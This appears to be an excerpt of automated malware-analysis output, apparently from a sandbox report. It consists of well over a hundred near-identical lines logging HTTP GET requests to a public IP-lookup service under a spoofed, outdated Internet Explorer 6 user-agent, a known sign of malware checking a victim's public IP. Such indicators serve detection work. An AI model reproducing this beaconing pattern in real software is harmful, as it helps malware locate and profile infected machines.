Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
